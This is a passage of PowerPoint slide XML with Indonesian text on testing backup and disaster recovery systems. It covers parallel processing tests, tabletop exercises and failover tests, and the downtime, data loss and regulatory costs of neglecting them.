              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengganggu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> normal. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> parallel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemadaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>latihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, uji failover, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simulasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paralel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghadapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di dunia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nyata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teruji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diharapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>henti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang lama, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kehilangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>reputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghadapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peningkatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mitigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hukuman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhirnya</a:t>
